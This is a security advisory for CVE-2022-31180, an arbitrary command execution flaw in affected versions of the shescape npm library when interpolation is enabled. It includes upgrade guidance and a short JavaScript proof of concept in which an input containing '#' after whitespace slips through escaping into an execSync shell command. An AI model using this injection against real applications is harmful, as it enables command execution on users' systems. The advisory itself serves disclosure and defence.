Arbitrary Command Execution Affecting shescape package, versions >=1.4.0 <1.5.8
- Snyk ID SNYK-JS-SHESCAPE-2952704
- published 17 Jul 2022
- disclosed 15 Jul 2022
- credit Unknown
Introduced: 15 Jul 2022
CVE-2022-31180
How to fix?
Upgrade shescape to version 1.5.8 or higher.
Overview
shescape is a simple shell escape library.
Affected versions of this package are vulnerable to Arbitrary Command Execution for systems using the escape or escapeAll functions with the interpolation option set to true, on Bash, Dash, Zsh, or PowerShell shells. Under those conditions, an attacker can cause arbitrary commands to be executed by including them after certain whitespace characters in their input.
NOTE: The undesirable behavior is mitigated partially in version 1.5.7 but fully removed in version 1.5.8. It can also be worked around by eliminating use of the interpolation: true option.
PoC:
import cp from "node:child_process";
import * as shescape from "shescape";

// 1. Prerequisites: one of the affected shells (pick exactly one)
const options = {
  shell: "bash",
  // Or
  // shell: "dash",
  // Or
  // shell: "powershell.exe",
  // Or
  // shell: "zsh",
  // Or
  // shell: undefined, // Only if the default shell is one of the affected shells.
};

// 2. Attack (one of multiple): a "#" following whitespace starts a shell comment
const payload = "foo #bar";

// 3. Usage: the escaped value has to be captured and used in the command string
let escapedPayload = shescape.escape(payload, { interpolation: true });
// Or, with escapeAll, which takes and returns an array of arguments
// escapedPayload = shescape.escapeAll([payload], { interpolation: true }).join(" ");

cp.execSync(`echo Hello ${escapedPayload}!`, options);
// _Output depends on the shell being used_